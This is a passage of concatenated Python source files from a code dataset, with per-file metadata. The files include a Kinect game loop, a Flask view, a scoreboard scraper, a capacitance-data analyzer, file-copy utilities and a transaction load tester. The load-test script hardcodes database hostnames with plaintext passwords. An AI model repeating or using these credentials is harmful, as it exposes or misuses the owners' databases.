int((time.time()-self.begin_time)*self.fps)\n if not self.sensor and self.frame > self.last_frame: break\n\n\n def breakout(self):\n pygame.init()\n self._clock = pygame.time.Clock()\n self._infoObject = pygame.display.Info()\n self._screen = pygame.display.set_mode((1430, 650), pygame.HWSURFACE | pygame.DOUBLEBUF | pygame.RESIZABLE, 32)\n self.breakout_surface = pygame.Surface((1000,800), 0, 32)\n pygame.display.set_caption('Breakout')\n pygame.font.init()\n self.myfont = pygame.font.SysFont('Comic Sans MS', 30)\n # self.draw_background(self.topdown_surface)\n self._screen.fill(white)\n self.head_id_count = 0\n self.head_locations = []\n self.begin_time = time.time()\n # self.fps = 90\n\n self.sensor = True\n self.record = False\n\n\n\n # if not self.sensor:\n # self.folder_name = \"kinect_recording_1606224934\"\n # self.folder_path = \"C:/Users/david/Documenten/peno/P_en_O_3_computer_vision/kinect_data/\" + self.folder_name + \"/\"\n # self.color_files = [f for f in os.listdir(self.folder_path + \"color\")]\n # self.depth_files = [f for f in os.listdir(self.folder_path + \"depth\")]\n # self.heads_files = [f for f in os.listdir(self.folder_path + \"heads\")]\n # self.last_frame = max([int(element.split(\"_\")[1].split(\".\")[0]) for element in self.heads_files])\n #\n # if self.record:\n # self.folder_name = str(int(time.time()))\n # self.folder_path = \"C:/Users/david/Documenten/peno/P_en_O_3_computer_vision/kinect_data/kinect_recording_\" + self.folder_name\n # os.mkdir(self.folder_path)\n # os.mkdir(self.folder_path + \"/color\")\n # os.mkdir(self.folder_path + \"/depth\")\n # os.mkdir(self.folder_path + \"/heads\")\n # print(\"made directory\", self.folder_path)\n\n coordinate = [0,0]\n\n while True:\n\n # if not self.sensor: self.frame_name = \"frame_\" + str(self.frame) + \".npy\"\n\n if self._kinect.has_new_body_frame():\n self._bodies = self._kinect.get_last_body_frame()\n # print(self._bodies, coordinate)\n self.new_body_frame = True\n\n head_location_to_add = self.get_head_location()\n if head_location_to_add is not None: self.head_locations = head_location_to_add\n if len(self.head_locations) > 0:\n coordinate = self.convert_to_coordinates(self.head_locations[0])\n # print(coordinate)\n\n\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.VIDEORESIZE:\n self._screen = pygame.display.set_mode(event.dict['size'],\n pygame.HWSURFACE | pygame.DOUBLEBUF | pygame.RESIZABLE, 32)\n self._screen.fill(white)\n\n if self.head_locations is not None and len(self.head_locations) > 0:\n print(self.head_locations)\n # self.draw_background(self.topdown_surface)\n\n # self.draw_heads()\n\n # self.draw_foreground()\n\n # self.frame = int((time.time() - self.begin_time) * self.fps)\n # if not self.sensor and self.frame > self.last_frame: break\n\n\n\nimport _thread\n\ntopDownObject = TopDownViewRuntime();\n\n# topDownObject.breakout()\ntopDownObject.user_interface()\n#\n\n# topDownObject.d3d_map()\n\n# position = topDownObject.get_position_from_frame((1,1))\n# print(position)\n","sub_path":"kinect_packages/kinect_working_version_sensor_backup3.py","file_name":"kinect_working_version_sensor_backup3.py","file_ext":"py","file_size_in_byte":31503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"312927066","text":"from flask import url_for\n\nclass InnovationCenterTableView:\n def __init__(self,dataquery):\n self.__dataquery = dataquery\n self.items=self.__parse()\n\n def __parse(self):\n items=[]\n for i in self.__dataquery:\n item=self.__itemparse(i)\n items.append(item)\n return items\n\n def __itemparse(self,item):\n id=item.id\n name=item.name\n type_one=item.type_one\n type_two=item.type_two\n if item.image_url is not None:\n imageurl=url_for('api_1_0.uploaded_file',filename=item.image_url)\n else:\n imageurl=''\n r={\n 'id':id,\n 'name':name,\n 'type_one':type_one,\n 'type_two':type_two,\n 'image':imageurl\n }\n return r","sub_path":"app/viewmodels/rollingdata.py","file_name":"rollingdata.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"601443468","text":"# Center() - Returns a centered string\n# Syntax - string.center(length, character)\n# Parameter Values :- Length : The length of the returned string And Character :The character to fill the missing space on each side. Default is \" \" (space)\n\n# Print the word \"banana\", taking up the space of 20 characters, with \"banana\" in the middle:\ntxt = \"banana\"\n\nx = txt.center(20)\n\nprint(x)\n\n# Using the letter \"O\" as the padding character:\ntxt = \"banana\"\n\nx = txt.center(20, \"O\")\n\nprint(x)\n","sub_path":"Python_String_Methods/Center().py","file_name":"Center().py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"23874075","text":"#!/usr/bin/env python3\nimport sys\nfrom time import sleep\n\nfrom requests import get\nfrom requests.exceptions import ConnectionError\n\n\ndef colorize(text, colorhex='#dea050'):\n return f\"{text}\"\n\n\nif len(sys.argv) > 1:\n print(colorize(\"---\"))\nelse:\n API_BASE = 'https://min-api.cryptocompare.com'\n for attempt in range(3):\n try:\n r = get(f\"{API_BASE}/data/price\", params={'fsym': 'DASH', 'tsyms': 'USD'})\n except ConnectionError:\n sleep(6)\n else:\n price = r.json()['USD']\n print(colorize(f\"${price:.2f}\"))\n break\n","sub_path":"Code/panel_scripts/dash/price.py","file_name":"price.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"395550163","text":"# !usr/bin/Python3\n# -*- coding: UTF-8 -*-\n# to analyze Solomon's the comprehensive Cm(full charge)\n# Rey\n# Version: 5.1\n\nimport numpy as np\nimport pandas as pd\nimport os, sys\nimport csv\nimport time\nimport math\nfrom progressbar import *\nfrom mpl_toolkits import mplot3d\nimport matplotlib.pyplot as plt\nimport scipy.linalg\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndef makeDf(fp, upper, bottom):\n with open(fp, \"r\") as f:\n rows = f.readlines()\n df = []\n df = (rows[upper - 1:bottom])\n df = [x.split() for x in df]\n df = pd.DataFrame(df)\n df = df[0].str.split(\",\", expand = True)\n df = pd.DataFrame(df.loc[:, 1:51])\n for i in range(df.shape[1]):\n df[i+1] = pd.to_numeric(df[i+1])\n return df\n#--- average value ---#\ndef mean_(list):\n return round(sum(list) / len(list), 5)\n\ndef std_(list):\n return round(math.sqrt(sum((list - mean_(list)) ** 2) / (len(list)-1)), 5)\n\ndef remove(list, obj):\n return [x for x in list if x != obj]\n\ndef index(list, value):\n return [f\"Y{i}-Y{i+1}\" for i, x in enumerate(list) if x == value]\n\ndef pre_test(df):\n emp_cnt = 0\n if df.shape[0] != 38 and df.shape[1] != 51:\n switch = False\n emp_cnt += 1\n print(f\"{file}'s shape is wrong! {df.shape[0], df.shape[1]}\")\n err_list.append(f\"{file}'s shape is wrong! {df.shape[0], df.shape[1]}\")\n elif min(df.min()) < 16384:\n switch = False\n print(f\"{file} have to be confirmed again!(<16384)\")\n err_list.append(f\"{file} have to be confirmed again!(<16384)\")\n else:\n switch = True\n return switch, emp_cnt\n\ndef dosomework():\n time.sleep(0.01)\n\ndef Test_1(df):\n diff = 0\n count = 0\n diff = max(df.max()) - min(df.min())\n if (diff) < 1800:\n count += 0\n elif (diff) >= 1800:\n count += 1\n return count\n\ndef Test_2(df):\n count = 0\n for j in range(df.shape[1]):\n for i in range(df.shape[0]):\n if df.iloc[i, j] >= 23500 or df.iloc[i, j] <= 20500:\n count += 1\n else:\n count += 0\n return count\n# ---old method--- #\ndef Test_4(df):\n dfmean = round(mean_(df[0:].mean()), 2)\n ub = round(mean_(df[0:].mean()) * 0.15, 2)\n bb = round(mean_(df[0:].mean()) * 0.1, 2)\n count = 0\n for j in range(df.shape[1]):\n for i in range(df.shape[0]):\n if (df.iloc[i, j] - dfmean) >= 0:\n if (df.iloc[i, j] - dfmean) >= ub:\n count += 1\n elif (df.iloc[i, j] - dfmean) <= 0:\n if (df.iloc[i, j] - dfmean) <= -bb:\n count += 1\n else:\n count += 0\n return count\n# ---vendor's method--- #\ndef Test_3(df):\n count = 0\n for i in range(len(df.columns)):\n x = np.linspace(1, len(df.index), len(df.index))\n y = np.asarray(df[i+1])\n fit = np.polyfit(x, y, 2, full=True)[0]\n formula = np.poly1d(fit)\n reg = formula(x)\n ceiling = reg * 1.15\n ground = reg * 0.9\n for j in range(len(df.index)):\n if y[j] > reg[j]:\n if y[j] >= ceiling[j]:\n count += 1\n elif y[j] < reg[j]:\n if y[j] <= ground[j]:\n count += 1\n else:\n count += 0\n return count\n\ndef analyze(data, order):\n x = np.linspace(1, len(data), len(data)) \n y = data\n fit = np.polyfit(x, y, order, full=True)[0]\n formula = np.poly1d(fit)\n y_bar = mean_(data)\n y_hat = formula(x)\n SSR = sum((y_hat - y_bar)**2)\n SSE = sum((y - y_hat)**2)\n SSTO = sum((y - y_bar)**2)\n MAE = sum(abs(y - y_hat))/len(y)\n RMSE = math.sqrt(sum((y - y_hat)**2)/len(y))\n return SSR/SSTO, SSE, MAE, RMSE\n\ndef MDrow(path):\n YMD = []\n YMDline = 0\n switch = True\n fp = os.path.join(path, file)\n with open(fp, \"r\") as f:\n iter_f = iter(f)\n #Find the index of differential\n for i, line in enumerate(iter_f):\n if \"36) MicroDefect\" in line:\n YMDline = i + 16\n with open(fp, \"r\") as f:\n rows = f.readlines()\n YMD = rows[YMDline]\n YMD = YMD.replace(\"%\", \"\")\n YMD = YMD.replace(\"Diff\", \"\")\n YMD = YMD.replace(\",\", \" \")\n YMD = [float(x) for x in YMD.split()]\n if len(YMD) == 0:\n print(\"Y MD is empty!\")\n switch = False\n return YMD, switch\n\ndef rowNumber(path):\n CmUpper = 0\n hCmUpper = 0\n fp = os.path.join(path, file)\n with open(fp, \"r\") as f:\n iter_f = iter(f)\n #Find the index of differential\n for i, line in enumerate(iter_f):\n if \"Reference Value at Charger Time\" in line:\n CmUpper = i + 3\n hCmUpper = i + 53\n CmBottom = CmUpper + 37\n hCmBottom = hCmUpper + 37\n return CmUpper, CmBottom, hCmUpper, hCmBottom\n\n__mode = input(\"Please set analyze mode!\\n\\\n 1 for SSE\\n\\\n 2 for R square\\n\\\n 3 for MAE\\n\\\n 4 for RMSE\\n\\\n (default = MAE)\\n\")\nif __mode != \"\":\n __mode = int(__mode)\nelse:\n __mode = 3\n\nrename_mode = input(\"Do you want to rename the data?\\n\\\n (y/n, default = n)\\n\")\nrename_mode = str(rename_mode)\nif rename_mode == \"y\":\n rename_mode = True\nelif rename_mode == \"n\" or rename_mode == \"\":\n rename_mode = False\n\nplot_all_mode = input(\"Do you want to plot all the results?\\n\\\n (y/n, default = n)\\n\")\nplot_all_mode = str(plot_all_mode)\nif plot_all_mode == \"y\":\n plot_all_mode = True\nelif plot_all_mode == \"n\" or plot_all_mode == \"\":\n plot_all_mode = False\n\nif plot_all_mode==True:\n true_pass = False\nelse:\n true_pass = input(\"Do you want to plot the mean and threthold values?\\n\\\n (y/n, default = n)\\n\")\n true_pass = str(true_pass)\n if true_pass == \"y\":\n true_pass = True\n elif true_pass == \"n\" or true_pass == \"\":\n true_pass = False\n\npath = \"./log/\"\nspath = \"./save.csv\"\nerr_path = \"./err.csv\"\n\nfiles = os.listdir(path)\n\npre_write = {\n \"test\":[0]\n}\npredf = pd.DataFrame(pre_write)\n\nsave_mode = True\n\ntry:\n predf.to_csv(spath)\n predf.to_csv(err_path)\nexcept PermissionError:\n print(\"Please close save/err.csv !\")\n save_mode = False\n\n\nfile_list = []\nCmSTDlist = []\nerr_list = []\nTest_1_count_list = []\nTest_2_count_list = []\nTest_3_count_list = []\nTest_4_count_list = []\nlog10_SSE_list = []\nSSE_list = []\nSSE_pass_list = []\nr2_list = []\nr2_pass_list = []\nMAE_list = []\nMAE_pass_list = []\nRMSE_list = []\nRMSE_pass_list = []\nYMD_list = []\nif save_mode==True:\n widgets = ['Progress: ',Percentage(), ' ', Bar('#'),' ', Timer(),\n ' ', ETA(), ' ', FileTransferSpeed()]\n pbar = ProgressBar(widgets=widgets, maxval=10*len(files)).start()\n\n switch = False\n good_cnt = 0\n test_fail = 0\n data_error = 0\n k = 0\n for file in files:\n \n k += 1\n fp = os.path.join(path, file)\n \n try:\n CmUpper, CmBottom, hCmUpper, hCmBottom = rowNumber(path)\n # print(CmUpper, CmBottom, hCmUpper, hCmBottom)\n except:\n print(f\"{file} rows' range wrong!\")\n err_list.append(f\"{file} rows' range wrong!\")\n switch = False\n\n try:\n CmTb = makeDf(fp, CmUpper, CmBottom)\n hCmTb = makeDf(fp, hCmUpper, hCmBottom)\n except:\n print(f\"{file} Full-charge Cm cannot be arranged!\")\n err_list.append(f\"{file} Full-charge Cm cannot be arranged!\")\n switch = False\n\n try:\n switch, _ = pre_test(CmTb)\n if switch == True:\n switch, _ = pre_test(hCmTb)\n\n except ValueError:\n print(f\"{file} min() arg is an empty sequence\")\n err_list.append(f\"{file} min() arg is an empty sequence\")\n switch = False\n try:\n if switch == True:\n YMD, switch = MDrow(path)\n YMD_list.append(max(YMD))\n else:\n print(f\"{file} MD can't be analyzed!\")\n err_list.append(f\"{file} MD can't be analyzed!\")\n switch = False\n except:\n print(f\"{file} MD analyze fail!\")\n switch = False\n\n if switch == True:\n file_list.append(file)\n try:\n Test_1_count = Test_1(CmTb)\n Test_1_count_list.append(Test_1_count)\n except:\n print(f\"{file} test_1 cannot be analyzed!\")\n err_list.append(f\"{file} test_1 cannot be analyzed!\")\n\n try:\n Test_2_count = Test_2(CmTb)\n Test_2_count_list.append(Test_2_count)\n except:\n print(f\"{file} Test_2 cannot be analyzed!\")\n err_list.append(f\"{file} test_2 cannot be analyzed!\")\n\n try:\n Test_3_count = Test_3(CmTb)\n Test_3_count_list.append(Test_3_count)\n except:\n print(f\"{file} Test_3 cannot be analyzed\")\n err_list.append(f\"{file} test_3 cannot be analyzed!\")\n\n try:\n Test_4_count = Test_4(CmTb)\n Test_4_count_list.append(Test_4_count)\n except:\n print(f\"{file} Test_4 cannot be analyzed\")\n err_list.append(f\"{file} test_4 cannot be analyzed!\")\n \n if Test_1_count+Test_2_count+Test_3_count != 0:\n test_fail += 1\n if rename_mode == True:\n os.rename(os.path.join(path, file), os.path.join(path, \"FAIL_\"+file))\n\n\n analysis_mode = False\n if __mode == 1:\n log10_SSE_list.append(-1)\n SSE_list.append(-1)\n elif __mode == 2:\n r2_list.append(-1)\n elif __mode == 3:\n MAE_list.append(-1)\n elif __mode == 4:\n RMSE_list.append(-1)\n\n else:\n analysis_mode = True\n \n if analysis_mode == True:\n good_cnt += 1\n x = np.linspace(1, 51, 51)\n y = np.array(CmTb.mean())\n r2, SSE, MAE, RMSE = analyze(y, 2)\n SSE_list.append(round(SSE, 3))\n SSE_pass_list.append(round(SSE, 3))\n log10_SSE_list.append(round(math.log10(SSE), 3))\n r2_list.append(round(r2, 3))\n r2_pass_list.append(round(r2, 3))\n MAE_list.append(round(MAE, 3))\n MAE_pass_list.append(round(MAE, 3))\n RMSE_list.append(round(RMSE, 3))\n RMSE_pass_list.append(round(RMSE, 3))\n\n if __mode == 1:\n try:\n if rename_mode == True:\n os.rename(os.path.join(path, file), os.path.join(path, f\"{round(SSE, 3)}_\" + file))\n except:\n print(f\"{file} SSE linear regresion error!\")\n elif __mode == 2:\n try:\n \n if rename_mode == True:\n os.rename(os.path.join(path, file), os.path.join(path, f\"{round(r2, 3)}_\" + file))\n except:\n print(f\"{file} R2 linear regresion error!\")\n elif __mode == 3:\n try:\n \n if rename_mode == True:\n os.rename(os.path.join(path, file), os.path.join(path, f\"{round(MAE, 3)}_\" + file))\n except:\n print(f\"{file} MAE linear regresion error!\")\n elif __mode == 4:\n try:\n \n if rename_mode == True:\n os.rename(os.path.join(path, file), os.path.join(path, f\"{round(RMSE, 3)}_\" + file))\n except:\n print(f\"{file} RMSE linear regresion error!\")\n \n\n else:\n data_error += 1\n if rename_mode == True:\n os.rename(os.path.join(path, file), os.path.join(path, \"FAIL_\"+file))\n\n if __mode == 1:\n log10_SSE_list.append(-1)\n SSE_list.append(-1)\n elif __mode == 2:\n r2_list.append(-1)\n elif __mode == 3:\n MAE_list.append(-1)\n elif __mode == 4:\n RMSE_list.append(-1)\n\n print(f\"{file} is empty!\")\n err_list.append(f\"{file} is empty!\")\n file_list.append(file)\n Test_1_count_list.append(-1)\n Test_2_count_list.append(-1)\n Test_3_count_list.append(-1)\n Test_4_count_list.append(-1)\n \n pbar.update(10 * k)\n dosomework()\n pbar.finish()\n\n\n'''#--- plot regression ---#'''\nif plot_all_mode == False:\n if __mode == 1:\n data = log10_SSE_list\n plt_data = SSE_list\n pass_data = SSE_pass_list\n y_label = \"SSE\"\n elif __mode == 2:\n data = r2_list\n plt_data = data\n pass_data = r2_pass_list\n y_label = \"R square\"\n elif __mode == 3:\n data = MAE_list\n plt_data = data\n pass_data = MAE_pass_list\n y_label = \"MAE\"\n elif __mode == 4:\n data = RMSE_list\n plt_data = data\n pass_data = RMSE_pass_list\n y_label = \"RMSE\"\n x = np.linspace(1, len(data), len(data))\n plt.scatter(x, plt_data)\n plt.ylabel(y_label)\n plt.xlabel(\"# of pieces\")\n\nelse:\n if __mode == 1:\n data = log10_SSE_list\n y_label = \"SSE\"\n elif __mode == 2:\n data = r2_list\n y_label = \"R square\"\n elif __mode == 3:\n data = MAE_list\n y_label = \"MAE\"\n elif __mode == 4:\n data = RMSE_list\n y_label = \"RMSE\"\n \n SSE_plt_data = SSE_list\n r2_plt_data = r2_list\n MAE_plt_data = MAE_list\n RMSE_plt_data = RMSE_list\n\n fig = plt.figure()\n x = np.linspace(1, len(data), len(data))\n plt.subplot(221)\n plt.scatter(x, SSE_plt_data)\n plt.title(\"SSE\")\n plt.ylabel(\"SSE\")\n plt.xlabel(\"# of pieces\")\n\n plt.subplot(222)\n plt.scatter(x, r2_plt_data)\n plt.title(\"R square\")\n plt.ylabel(\"R square\")\n plt.xlabel(\"# of pieces\")\n\n plt.subplot(223)\n plt.scatter(x, MAE_plt_data)\n plt.title(\"MAE\")\n plt.ylabel(\"MAE\")\n plt.xlabel(\"# of pieces\")\n\n plt.subplot(224)\n plt.scatter(x, RMSE_plt_data)\n plt.title(\"RMSE\")\n plt.ylabel(\"RMSE\")\n plt.xlabel(\"# of pieces\")\n\nsave_dict = {\n \"filename\": file_list,\n \"Max. - Min. < 1800\": Test_1_count_list,\n \"20500 < Cm < 23500\": Test_2_count_list,\n \"(0.9Cm_hat) < Cm < (1.15Cm_hat)\": Test_3_count_list,\n \"(0.9mean) < Cm < (1.15mean)\": Test_4_count_list,\n \"Y_Max MicroDefect\": YMD_list,\n y_label: data\n }\n\nerr_dict = {\n \"Error\": err_list\n }\n\nsave_df = pd.DataFrame(save_dict)\n\nerr_df = pd.DataFrame(err_dict)\nerr_df.to_csv(err_path, index=False)\n\ntry:\n save_df.to_csv(spath, index=False)\nexcept PermissionError:\n print(\"Please close the save data!\")\n\nif true_pass == True and plot_all_mode==False:\n if __mode != 2:\n #--- exclude \"Fail\"(-1) data already ---#\n spec_ceiling = mean_(np.asarray(pass_data)) + 3 * std_(np.asarray(pass_data))\n spec_bottom = mean_(np.asarray(pass_data)) - 3 * std_(np.asarray(pass_data))\n if __mode == 1:\n print(f\"SSE threshold value: {spec_ceiling}\")\n log10_spec_ceiling = math.log10(spec_ceiling)\n print(f\"log10(SSE) threshold value: {log10_spec_ceiling}\")\n else:\n print(f\"{y_label} treshold value: {spec_ceiling}\")\n plt.plot(x, [mean_(np.asarray(pass_data))] * len(x))\n plt.plot(x, [spec_ceiling] * len(x), c=\"r\")\n\nprint(f\"Data Error No.: {data_error} pcs.\")\nprint(f\"Test Fail No.: {test_fail} pcs.\")\nprint(f\"Good Panel No.: {good_cnt} pcs.\")\nprint(f\"Total No.: {k} pcs.\")\n\nplt.show()","sub_path":"MD_Analyzer/MD_analyzer_Ver.5.1.py","file_name":"MD_analyzer_Ver.5.1.py","file_ext":"py","file_size_in_byte":16026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"487957625","text":"import requests\nimport json\nfrom os import path\nimport time\nimport bs4\nimport os\n\n\ndef json_input(path):\n with open(path, 'r') as f:\n return json.load(f)\n\n\n_params = json_input('params.json')\ndata_dir = _params['data_dir']\nimage_download_host = _params['image_download_host']\ncharset = _params['charset']\nend_time = _params['end_time']\nstart_time = _params['start_time']\n\n\ndef json_output(data):\n return json.dumps(data, sort_keys=False, separators=(',', ':'), ensure_ascii=False)\n\n\ndef output(filename, data):\n with open(path.join(data_dir, filename), 'w') as f:\n f.write(json_output(data))\n\n\ndef get_timestamp(dt):\n # 转换成时间数组\n timeArray = time.strptime(dt, \"%Y-%m-%d %H:%M:%S\")\n # 转换成时间戳\n timestamp = time.mktime(timeArray)\n return int(timestamp)\n\n\ndef get_now():\n return int(time.time())\n\n\ndef get_incorrect_timestamp():\n return min(get_now(), get_timestamp(end_time)) - get_timestamp(start_time)\n\n\ndef mkdir(_path):\n if not path.exists(_path):\n os.makedirs(_path)\n\n\ndef urltobase64(url):\n import base64\n import requests as req\n from io import BytesIO\n print(\"downloading... \" + url)\n response = req.get(url)\n img_data_b64 = base64.b64encode(BytesIO(response.content).read())\n print(url + \" downloaded.\")\n return bytes.decode(img_data_b64)\n\n\ndef urllib_download(img_url, dist):\n from urllib.request import urlretrieve\n mkdir(path.split(dist)[0])\n urlretrieve(img_url, dist)\n\n\ndef fetch():\n if 'board_url' in _params.keys():\n board_url = _params['board_url']\n params = (\n ('t', get_now()),\n )\n\n response = requests.get(board_url, params=params)\n return response.text\n\n html = response.text.encode(\"latin1\").decode(charset)\n return html\n else:\n board_file = _params['board_file']\n with open(board_file, 'r') as f:\n return f.read()\n\n\ndef team_out(html):\n team = {}\n soup = bs4.BeautifulSoup(html, 'html5lib')\n\n # 默认选择第0个 如果在榜单前出现其他 tbody 元素会出错\n tbody = soup.select('tbody')[0]\n\n trs = tbody.select('tr')\n for tr in trs:\n if not tr.has_attr('id'):\n continue\n\n _team = {}\n team_id = tr['id']\n\n img_src = tr.select('img')[0]['src']\n\n if len(img_src) > 0 and img_src[0] == '/':\n img_src = img_src[1:len(img_src)]\n\n for i in range(10):\n try:\n badge_base64 = urltobase64(\n path.join(image_download_host, img_src))\n break\n except Exception as e:\n print(\"fetch img failed...\")\n print(e)\n\n time.sleep(5)\n\n name = tr.select('img')[0]['title']\n\n _team['official'] = 1\n\n _team['badge'] = {}\n _team['badge']['base64'] = badge_base64\n _team['name'] = name\n team[team_id] = _team\n\n if len(team.keys()) > 0:\n output(\"team.json\", team)\n\n\npre_runs = []\n\n\ndef run_out(html):\n global pre_runs\n\n run = []\n soup = bs4.BeautifulSoup(html, 'html5lib')\n\n tbody = soup.select('tbody')[0\n ]\n trs = tbody.select('tr')\n for tr in trs:\n if not tr.has_attr('id'):\n continue\n\n team_id = tr['id']\n _run = {}\n _run['team_id'] = team_id\n\n score_cells = tr.select('.score_cell')\n index = -1\n\n for score_cell in score_cells:\n index += 1\n\n if index >= 15:\n break\n\n _run['problem_id'] = index\n\n score_correct = score_cell.select('.score_correct')\n score_pending = score_cell.select('.score_pending')\n score_incorrect = score_cell.select('.score_incorrect')\n\n if len(score_correct) > 0:\n timestamp = int(score_correct[0].contents[0].strip(' \\n')) * 60\n cnt = int(score_correct[0].select('span')[\n 0].string.strip(' \\n').split(' ')[0])\n\n _run['timestamp'] = timestamp\n _run['status'] = 'incorrect'\n\n for i in range(1, cnt):\n run.append(_run.copy())\n\n _run['status'] = 'correct'\n run.append(_run.copy())\n\n if len(score_pending) > 0:\n incorrect_cnt = int(score_pending[0].select(\n 'span')[0].string.strip(' \\n').split(' ')[0])\n\n pending_cnt = int(score_pending[0].select(\n 'span')[0].string.strip(' \\n').split(' ')[2])\n\n for i in range(incorrect_cnt):\n _run['status'] = 'incorrect'\n _run['timestamp'] = 0\n run.append(_run.copy())\n\n for i in range(pending_cnt):\n _run['status'] = 'pending'\n _run['timestamp'] = get_incorrect_timestamp()\n run.append(_run.copy())\n\n if len(score_incorrect) > 0:\n cnt = int(score_incorrect[0].select(\n 'span')[0].string.strip(' \\n').split(' ')[0])\n\n for i in range(cnt):\n _run['status'] = 'incorrect'\n _run['timestamp'] = get_incorrect_timestamp()\n run.append(_run.copy())\n\n has_team_and_problem = {}\n\n for item in run:\n has_team_and_problem[str(item['team_id']) +\n \"-\" + str(item['problem_id'])] = 1\n\n _pre_runs = []\n\n for item in pre_runs:\n if (str(item['team_id']) + \"-\" + str(item['problem_id'])) not in has_team_and_problem.keys():\n _pre_runs.append(item)\n\n pre_runs = _pre_runs + run\n\n if len(pre_runs) > 0:\n output('run.json', pre_runs)\n\n\ndef sync():\n while True:\n print(\"fetching...\")\n try:\n html = fetch()\n\n team_out(html)\n run_out(html)\n\n print(\"fetch successfully\")\n except Exception as e:\n print(\"fetch failed...\")\n print(e)\n print(\"sleeping...\")\n time.sleep(20)\n\n\nsync()\n","sub_path":"origin-data/icpc/2020/world-finals/sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":6135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"526547015","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/7/17 09:16\n# @Author : CyIce\n# @Email : 1207201395@qq.com\n# @File : copy_file_1.py\n# @Software: PyCharm\n\nimport os, time\n\n\ndef copy_file(r_path, w_path):\n '''\n 拷贝文件\n :param r_path: 需要拷贝的文件路径\n :param w_path: 文件拷贝的地址\n '''\n fr = open(r_path, \"rb\")\n fw = open(w_path, \"wb\")\n context = fr.read()\n fw.write(context)\n fr.close()\n fw.close()\n time.sleep(1)\n\n\npath = \"./file_1\"\nto_path = \"./file_2\"\n\n# 获取path路径下所有文件名称\nfile_list = os.listdir(path)\nstart_time = time.time()\nfor file in file_list:\n copy_file(os.path.join(path, file), os.path.join(to_path, file))\nend_time = time.time()\n\nprint(\"总耗时%0.2f\" % (end_time - start_time))\n","sub_path":"多任务/多进程/copy_file_1.py","file_name":"copy_file_1.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"463300548","text":"#!/usr/bin/env python3\n\n# copy.py - Walk through a folder tree and search for files with a certain \n# file extension (such as .pdf or .jpg) and copy them to a new location.\n\nimport os, shutil\n\ndef copy(src_folder, ext, dest_folder):\n '''Copy the files with a certain file extension from a source folder\n to a destination folder.'''\n\n # make sure folder has absolute path\n src_folder = os.path.abspath(src_folder)\n \n # make sure destination folder exists\n if not os.path.isdir(dest_folder):\n os.path.mkdir(dest_folder)\n \n dest_folder = os.path.abspath(dest_folder)\n\n print('Copying files with extension %s' % ext)\n\n for foldername, subfolders, filenames in os.walk(src_folder):\n for filename in filenames:\n if filename.endswith(ext):\n filepath = os.path.join(src_folder, filename)\n shutil.copy(filepath, dest_folder)\n","sub_path":"ch09/copy.py","file_name":"copy.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"109083703","text":"import random\nimport uuid\nimport json\nfrom threading import Thread\nimport http.client, sys\nfrom queue import Queue\nimport time\nimport pg\n\n#Test can post txns to processor on dev.spentlabs.com:8600/crap/txns (but only serial send support is present because random UUID problem, when i start in parallel mode - i get same UUID (not random) and i dont know reason of that)\n\n# DBconn = pg.DB(host=\"spent-b2b-staging.cwmk7rmhhzlq.eu-west-1.rds.amazonaws.com\", user=\"postgres\", passwd=\"9Ez1Bu8ILD%nC*8khEHH4jTg\", dbname=\"postgres\")\nDBconn = pg.DB(host=\"postgres.dev.spentlabs.com\", user=\"postgres\", passwd=\"hasp513#burt\", dbname=\"postgres\")\nuserid1 = str(random.randint(1000, 100000000))\nsessionDiscription = str(random.randint(1000, 100000000))\nurlAuth = \"http://dev.spentlabs.com/api/v1/auth/token\"\nurlOffers = \"http://dev.spentlabs.com/api/v1/offers\"\nurlReadHash = \"SELECT * FROM customer_users where user_id='\" + userid1 + \"'\"\nurlreadresult = \"SELECT * FROM cashback_transaction where user_id='\" + userid1 + \"'\"\nprint('user_id = ',userid1)\n\n\nconcurrent = 10\nTxnCount = 10\nlst = []\nk = 0\nk1 = 0\nk2 = 0\nuschk = 0\nuserid = 0\nlist = ['pending','available','rejected']\ntotalsum = 0\nfsum = 0\ndef doWork():\n global k, k1, k2, w, totalsum\n w = 0\n # while w < TxnCount:\n # w += 1\n while True:\n time.sleep(0.1)\n lst,conn,fsum = q.get()\n print(lst)\n # print(payload)\n # print(json.dumps(lst))\n conn.request(\"POST\", \"/crap/txns\", json.dumps(lst))\n res = conn.getresponse()\n k2 += 1\n conn.close()\n # print(fsum)\n # print(lst)\n if res.status == 200:\n totalsum = totalsum + fsum\n k = k + 1\n print(k)\n else:\n k1 += 1\n # q.task_done()\n\n\n\nq = Queue(concurrent * concurrent)\nstart_time = time.time()\nfor i in range(concurrent):\n t = Thread(target=doWork)\n t.daemon = True\n t.start()\ntry:\n for body in range(0, concurrent):\n conn = http.client.HTTPConnection('dev.spentlabs.com', 8600)\n cnt = 0\n # lst.clear()\n # while cnt BASE_NEGATIVE_SCORE)\n\n def _map_score(self, score):\n return POSITIVE_SCORE if score >= BASE_POSITIVE_SCORE else NEGATIVE_SCORE\n\n def _callback(self, ch, method, properties, body):\n decoded_body = body.decode('UTF-8')\n\n if (self.log_counter % LOG_FREQUENCY == 0):\n logging.info(\"Received line [%d] %s\", self.log_counter, decoded_body)\n\n body_values = decoded_body.split(\",\")\n\n score = self.sentiment_analyzer.polarity_scores(body_values[TEXT])['compound']\n\n if (self.log_counter % LOG_FREQUENCY == 0):\n logging.info(\"Score is %s\", score)\n\n if self._is_score_neutral(score):\n if (self.log_counter % LOG_FREQUENCY == 0):\n logging.info(\"The score is 